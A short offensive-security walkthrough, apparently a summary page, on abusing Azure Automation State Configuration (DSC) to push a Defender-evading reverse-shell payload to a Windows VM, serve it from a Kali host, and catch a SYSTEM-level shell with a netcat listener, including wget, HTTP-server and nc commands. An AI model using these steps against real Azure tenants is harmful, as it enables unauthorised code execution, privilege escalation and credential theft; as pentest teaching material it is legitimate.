Az - State Configuration RCE

Reading time: 3 minutes

Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Summary of Remote Server (C2) Infrastructure Preparation and Steps

Overview

The process involves setting up a remote server infrastructure to host a modified Nishang Invoke-PowerShellTcp.ps1 payload, named RevPS.ps1, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP 40.84.7.74 using a simple Python HTTP server. The operation is executed through several steps:

Step 1 — Create Files

• Files Required: Two PowerShell scripts are needed:
  1. reverse_shell_config.ps1: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from GitHub.
  2. push_reverse_shell_config.ps1: A script to publish the configuration to the VM, available at GitHub.
• Customization: Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.

Step 2 — Zip Configuration File

• The reverse_shell_config.ps1 is compressed into a .zip file, making it ready for transfer to the Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Step 3 — Set Storage Context & Upload

• The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Step 4 — Prep Kali Box

• The Kali server downloads the RevPS.ps1 payload from a GitHub repository.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

• The script is edited to specify the target Windows VM and port for the reverse shell.

Step 5 — Publish Configuration File

• The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.

Step 6 — Host Payload and Setup Listener

• A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

• The scheduled task executes the payload, achieving SYSTEM-level privileges.

Conclusion

The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.